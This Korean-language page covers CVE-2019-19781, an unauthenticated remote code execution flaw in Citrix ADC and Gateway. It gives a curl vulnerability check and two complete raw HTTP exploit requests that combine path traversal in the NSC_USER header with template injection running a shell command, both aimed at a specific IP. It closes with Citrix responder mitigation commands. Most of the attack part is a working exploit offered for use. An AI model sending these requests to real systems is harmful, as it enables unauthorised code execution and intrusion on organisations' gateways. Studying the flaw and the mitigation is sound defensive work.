
CVE-2019-19781 - Citrix ADC Netscaler 원격 코드 실행 익스플로잇
Citrix Application Delivery Controller 및 Citrix Gateway에서의 원격 코드 실행(RCE)
Citrix Application Delivery Controller(ADC, 구 NetScaler ADC) 및 Citrix Gateway(구 NetScaler Gateway)에서 취약점이 확인되었습니다. 악용될 경우 인증되지 않은 공격자가 임의 코드 실행을 수행할 수 있습니다.
편집: Fireeye의 CVE-2019-19781용 침해 지표(IoC) 스캐너 -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/
영향을 받는 제품:

TARGET=your_ip
curl -vk –path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep “You don’t have permission to access /vpns/” >/dev/null && echo “VULNERABLE: $TARGET” || echo “MITIGATED: $TARGET”
POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl
이 취약점을 악용하려면 인증 없이 요청 두 번만 필요합니다!
첫 번째 요청:
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 103
url=http://exemple.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb
두 번째 요청:
GET /vpns/portal/bonclay4.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close

enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config